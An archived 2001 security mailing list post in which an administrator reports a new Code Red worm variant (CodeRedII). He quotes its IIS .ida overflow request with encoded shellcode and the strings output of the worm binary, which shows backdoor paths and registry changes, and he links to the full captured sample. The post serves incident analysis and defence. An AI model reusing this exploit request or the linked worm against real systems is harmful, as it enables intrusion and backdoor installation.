Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

new variant?

From: Stephen Friedl <friedl () mtndew com>
Date: Sat, 4 Aug 2001 08:34:49 -0700
Hello all,

I'm sorry if this is old news: but is there a new variant going around?
My logs just started showing entries with the signature

        /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX...

instead of the 

        /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN...

that we've been used to. I know there is a CRv2, but I cannot find any
references to a different signature. I've captured the entire request,
and though the % code is all the same, the payload is different. This
is the "strings" output on the binary:

----------------------------------------------------------------------
GET 
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
  HTTP/1.0
Content-type: text/xml
Content-length: 3379 
CodeRedII
F4)E
Th~f
Th~f
;MZu
KERNu
EL32u
GetPu
rocAu
D$$dg
LoadLibraryA
CreateThread
GetTickCount
Sleep
GetSystemDefaultLangID
GetSystemDirectoryA
CopyFileA
GlobalFindAtomA
GlobalAddAtomA
CloseHandle
_lcreat
_lwrite
_lclose
GetSystemTime
WS2_32.DLL
socket
closesocket
ioctlsocket
connect
select
send
recv
gethostname
gethostbyname
WSAGetLastError
USER32.DLL
ExitWindowsEx
\CMD.EXE
d:\inetpub\scripts\root.exe
d:\progra~1\common~1\system\MSADC\root.exe
hT @
hH @
hX @
t6Ff
%`0@
%d0@
%h0@
%p0@
%t0@
%x0@
%|0@
\EXPLORER.EXE
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SFCDisable
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots
/Scripts
/MSADC
c:\,,217
d:\,,217
KERNEL32.dll
ADVAPI32.dll
Sleep
GetWindowsDirectoryA
WinExec
RegQueryValueExA
RegSetValueExA
RegOpenKeyExA
RegCloseKey
d:\explorer.exe
8>u'j 
----------------------------------------------------------------------

The 3818 byte capture file is on my web server if anybody wants to poke around:

        http://www.unixwiz.net/misc/codered.bin

Thanks to dwmorris at DSLReports.com for the heads up on this.

Steve

--- 
Stephen J Friedl | Software Consultant | Tustin, CA |   +1 714 544-6561
www.unixwiz.net  | I speak for me only |   KA8CMY   | steve () unixwiz net

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: